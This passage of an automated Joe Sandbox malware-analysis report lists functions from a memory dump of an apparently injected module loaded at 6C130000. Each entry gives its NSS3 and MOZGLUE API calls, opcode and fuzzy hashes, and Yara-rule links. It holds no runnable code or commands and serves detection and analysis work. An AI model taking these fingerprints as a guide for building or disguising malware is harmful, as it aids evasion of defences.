                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                        • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                        • API String ID: 977052965-1032500510
                                                                                                        • Opcode ID: f9db4a914b4baaa1c05434f0c4c7103979e0ef9ccfa083a2ee042f500b5bc5d5
                                                                                                        • Instruction ID: 9b39a2cac09fa388e28e2670bed6f4e3ef944147d678e267c8b3fc5b5498d22b
                                                                                                        • Opcode Fuzzy Hash: f9db4a914b4baaa1c05434f0c4c7103979e0ef9ccfa083a2ee042f500b5bc5d5
                                                                                                        • Instruction Fuzzy Hash: 6361A4B5E0010E9BDB10DF55CC84AABB7B6FF84359F144129EC19A7700EB31A925CBA1
                                                                                                        Function 6C1B8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B8E5B
                                                                                                        • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C1B8E81
                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C1B8EED
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C2E18D0,?), ref: 6C1B8F03
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1B8F19
                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C1B8F2B
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C1B8F53
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C1B8F65
                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C1B8FA1
                                                                                                        • SECITEM_DupItem_Util.NSS3(?), ref: 6C1B8FFE
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1B9012
                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C1B9024
                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C1B902C
                                                                                                        • PORT_DestroyCheapArena.NSS3(?), ref: 6C1B903E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                        • String ID: security
                                                                                                        • API String ID: 3512696800-3315324353
                                                                                                        • Opcode ID: 6a5b3920d95af8b5844af332b7f9a0301a7b9890256d89baa82553273ab9a5e0
                                                                                                        • Instruction ID: da0735fe64fb9bcbb9d2bbb98d3fe619ac73f6147596bd96f4e0aea11c463c9c
                                                                                                        • Opcode Fuzzy Hash: 6a5b3920d95af8b5844af332b7f9a0301a7b9890256d89baa82553273ab9a5e0
                                                                                                        • Instruction Fuzzy Hash: C65128B160C205ABF7109A149C81BAB73E8EB96B5CF45082EFD54A7F40E775D908CB63
                                                                                                        Function 6C27CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C27CC7B), ref: 6C27CD7A
                                                                                                          • Part of subcall function 6C27CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C1EC1A8,?), ref: 6C27CE92
                                                                                                        • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C27CDA5
                                                                                                        • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C27CDB8
                                                                                                        • PR_UnloadLibrary.NSS3(00000000), ref: 6C27CDDB
                                                                                                        • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C27CD8E
                                                                                                          • Part of subcall function 6C1A05C0: PR_EnterMonitor.NSS3 ref: 6C1A05D1
                                                                                                          • Part of subcall function 6C1A05C0: PR_ExitMonitor.NSS3 ref: 6C1A05EA
                                                                                                        • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C27CDE8
                                                                                                        • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C27CDFF
                                                                                                        • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C27CE16
                                                                                                        • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C27CE29
                                                                                                        • PR_UnloadLibrary.NSS3(00000000), ref: 6C27CE48
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                        • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                        • API String ID: 601260978-871931242
                                                                                                        • Opcode ID: 5b1d049a045c6dd267b669e33e2cd8b0f2805fb340db7ce386e5c59fd211d13b
                                                                                                        • Instruction ID: 65b3122a95e3143f0beffcda1e8274fbc03432ce183431c2b904a8a37a19b72b
                                                                                                        • Opcode Fuzzy Hash: 5b1d049a045c6dd267b669e33e2cd8b0f2805fb340db7ce386e5c59fd211d13b
                                                                                                        • Instruction Fuzzy Hash: 9111D6B9E1321A57D721EAB62C41AEA389C5B1750DF580535FC06E1F01FB31C51986F6
                                                                                                        Function 6C220C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(*,"l), ref: 6C220C81
                                                                                                          • Part of subcall function 6C20BE30: SECOID_FindOID_Util.NSS3(6C1C311B,00000000,?,6C1C311B,?), ref: 6C20BE44
                                                                                                          • Part of subcall function 6C1F8500: SECOID_GetAlgorithmTag_Util.NSS3(6C1F95DC,00000000,00000000,00000000,?,6C1F95DC,00000000,00000000,?,6C1D7F4A,00000000,?,00000000,00000000), ref: 6C1F8517
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C220CC4
                                                                                                          • Part of subcall function 6C20FAB0: free.MOZGLUE(?,-00000001,?,?,6C1AF673,00000000,00000000), ref: 6C20FAC7
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C220CD5
                                                                                                        • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C220D1D
                                                                                                        • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C220D3B
                                                                                                        • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C220D7D
                                                                                                        • free.MOZGLUE(00000000), ref: 6C220DB5
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C220DC1
                                                                                                        • free.MOZGLUE(00000000), ref: 6C220DF7
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C220E05
                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C220E0F
                                                                                                          • Part of subcall function 6C1F95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C1D7F4A,00000000,?,00000000,00000000), ref: 6C1F95E0
                                                                                                          • Part of subcall function 6C1F95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C1D7F4A,00000000,?,00000000,00000000), ref: 6C1F95F5
                                                                                                          • Part of subcall function 6C1F95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C1F9609
                                                                                                          • Part of subcall function 6C1F95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C1F961D
                                                                                                          • Part of subcall function 6C1F95C0: PK11_GetInternalSlot.NSS3 ref: 6C1F970B
                                                                                                          • Part of subcall function 6C1F95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C1F9756
                                                                                                          • Part of subcall function 6C1F95C0: PK11_GetIVLength.NSS3(?), ref: 6C1F9767
                                                                                                          • Part of subcall function 6C1F95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C1F977E
                                                                                                          • Part of subcall function 6C1F95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1F978E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                        • String ID: *,"l$*,"l$-$"l
                                                                                                        • API String ID: 3136566230-732375104
                                                                                                        • Opcode ID: 217d03ae2c7429a71e4ef2c730a0be7fd3684d47ed43580b9533351c79f42031
                                                                                                        • Instruction ID: f3e35f846929ca85dd0016972b01544949a76ac89743de3269275212737be788
                                                                                                        • Opcode Fuzzy Hash: 217d03ae2c7429a71e4ef2c730a0be7fd3684d47ed43580b9533351c79f42031
                                                                                                        • Instruction Fuzzy Hash: DF41D4B5E0124AABEB009F64DC55BEF7A74EF04309F100428ED1567741E739EA18CBE2
                                                                                                        Function 6C216CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C2E1DE0,?), ref: 6C216CFE
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C216D26
                                                                                                        • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C216D70
                                                                                                        • PORT_Alloc_Util.NSS3(00000480), ref: 6C216D82
                                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C216DA2
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C216DD8
                                                                                                        • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C216E60
                                                                                                        • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C216F19
                                                                                                        • PK11_DigestBegin.NSS3(00000000), ref: 6C216F2D
                                                                                                        • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C216F7B
                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C217011
                                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C217033
                                                                                                        • free.MOZGLUE(?), ref: 6C21703F
                                                                                                        • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C217060
                                                                                                        • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C217087
                                                                                                        • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C2170AF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2108637330-0
                                                                                                        • Opcode ID: 18aaaeeb8b0d5d5e37288ad6ddbac7b1a6eff7b8bd178e3bb96e810892796665
                                                                                                        • Instruction ID: 741079df2949ff095f7f63b20b3310de0ba9987f5f77011393ba56751fcaa884
                                                                                                        • Opcode Fuzzy Hash: 18aaaeeb8b0d5d5e37288ad6ddbac7b1a6eff7b8bd178e3bb96e810892796665
                                                                                                        • Instruction Fuzzy Hash: 5FA1D4B551C20A9BEB009A24CCC5B6F72E5DB8130DF244A39FE19CAE81E775D8498753
                                                                                                        Function 6C1DAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DAF25
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DAF39
                                                                                                        • PR_Unlock.NSS3(?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DAF51
                                                                                                        • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DAF69
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1DB06B
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1DB083
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1DB0A4
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1DB0C1
                                                                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 6C1DB0D9
                                                                                                        • PR_Unlock.NSS3 ref: 6C1DB102
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1DB151
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1DB182
                                                                                                          • Part of subcall function 6C20FAB0: free.MOZGLUE(?,-00000001,?,?,6C1AF673,00000000,00000000), ref: 6C20FAC7
                                                                                                        • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C1DB177
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DB1A2
                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DB1AA
                                                                                                        • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C1BAB95,00000000,?,00000000,00000000,00000000), ref: 6C1DB1C2
                                                                                                          • Part of subcall function 6C201560: TlsGetValue.KERNEL32(00000000,?,6C1D0844,?), ref: 6C20157A
                                                                                                          • Part of subcall function 6C201560: EnterCriticalSection.KERNEL32(?,?,?,6C1D0844,?), ref: 6C20158F
                                                                                                          • Part of subcall function 6C201560: PR_Unlock.NSS3(?,?,?,?,6C1D0844,?), ref: 6C2015B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 4188828017-0
                                                                                                        • Opcode ID: 3fb1209df5352c3cde145b871e452d0a10d6e9e0760f131294b57b6a784c219e
                                                                                                        • Instruction ID: b60962c60b8c7a7bd8f9c6a4ed7e70390cb83fa07739d476cb68e34768c55db9
                                                                                                        • Opcode Fuzzy Hash: 3fb1209df5352c3cde145b871e452d0a10d6e9e0760f131294b57b6a784c219e
                                                                                                        • Instruction Fuzzy Hash: F0A1C0B5E00209AFEF009F64DC81BEEB7B4AF15308F154125EC05A7751E735E999CBA2
                                                                                                        Function 6C22AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C22ADB1
                                                                                                          • Part of subcall function 6C20BE30: SECOID_FindOID_Util.NSS3(6C1C311B,00000000,?,6C1C311B,?), ref: 6C20BE44
                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C22ADF4
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C22AE08
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C22AE25
                                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C22AE63
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C22AE4D
                                                                                                          • Part of subcall function 6C134C70: TlsGetValue.KERNEL32(?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134C97
                                                                                                          • Part of subcall function 6C134C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CB0
                                                                                                          • Part of subcall function 6C134C70: PR_Unlock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CC9
                                                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C22AE93
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C22AECC
                                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C22AEDE
                                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C22AEE6
                                                                                                        • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C22AEF5
                                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C22AF16
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                        • String ID: security
                                                                                                        • API String ID: 3441714441-3315324353
                                                                                                        • Opcode ID: 2ccf83bf257458f7cd71e6770d237a74893391dac3dfeb62ea14533aad0be9cc
                                                                                                        • Instruction ID: 0bd4aec16accabdcd1a82d5263985c920852e655d8ddf1054b4495264bbd73dc
                                                                                                        • Opcode Fuzzy Hash: 2ccf83bf257458f7cd71e6770d237a74893391dac3dfeb62ea14533aad0be9cc
                                                                                                        • Instruction Fuzzy Hash: E04148B190421DEBE7215B189C85BAB72E8AF5271DF100535FD1492F41FB3E9509CAD3
                                                                                                        Function 6C2CAF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C279890: TlsGetValue.KERNEL32(?,?,?,6C2797EB), ref: 6C27989E
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C2CAF88
                                                                                                        • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C2CAFCE
                                                                                                        • PR_SetPollableEvent.NSS3(?), ref: 6C2CAFD9
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C2CAFEF
                                                                                                        • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C2CB00F
                                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C2CB02F
                                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C2CB070
                                                                                                        • PR_JoinThread.NSS3(?), ref: 6C2CB07B
                                                                                                        • free.MOZGLUE(?), ref: 6C2CB084
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C2CB09B
                                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C2CB0C4
                                                                                                        • PR_JoinThread.NSS3(?), ref: 6C2CB0F3
                                                                                                        • free.MOZGLUE(?), ref: 6C2CB0FC
                                                                                                        • PR_JoinThread.NSS3(?), ref: 6C2CB137
                                                                                                        • free.MOZGLUE(?), ref: 6C2CB140
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 235599594-0
                                                                                                        • Opcode ID: 54e940e359137df6ca03dfe45598a973cdb3ffb01f7455fab7edbc77ad1190dd
                                                                                                        • Instruction ID: 8666bd651beb008ae45cd3493cbcd32949e226646c40a24ad017721fc34d2bd7
                                                                                                        • Opcode Fuzzy Hash: 54e940e359137df6ca03dfe45598a973cdb3ffb01f7455fab7edbc77ad1190dd
                                                                                                        • Instruction Fuzzy Hash: 64919FB5A00609CFCB50DF14D884946BBF1FF453197298669DC195BB22E732FC45CB92
                                                                                                        Function 6C1C8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,?), ref: 6C1C8E22
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1C8E36
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8E4F
                                                                                                        • calloc.MOZGLUE(00000001,?,?,?), ref: 6C1C8E78
                                                                                                        • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C1C8E9B
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C1C8EAC
                                                                                                        • PL_ArenaAllocate.NSS3(?,?), ref: 6C1C8EDE
                                                                                                        • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C1C8EF0
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8F00
                                                                                                        • free.MOZGLUE(?), ref: 6C1C8F0E
                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C1C8F39
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8F4A
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8F5B
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1C8F72
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1C8F82
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1569127702-0
                                                                                                        • Opcode ID: fd6e742dcae8c8e8f38eeeec9485a309c0e6f274aaa7b7f893faa16d6df81bc7
                                                                                                        • Instruction ID: 5ecc60fb98d490c37413b36e0ccd2907f883f3dda3ec4026e9ddb484ca34a4dd
                                                                                                        • Opcode Fuzzy Hash: fd6e742dcae8c8e8f38eeeec9485a309c0e6f274aaa7b7f893faa16d6df81bc7
                                                                                                        • Instruction Fuzzy Hash: F751C1B2B002159FE7009E68CC8596EB7B9EF65758B15412AFC089B700E735ED45C7E2
                                                                                                        Function 6C1ECE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON
                                                                                                        Download Yara Rule
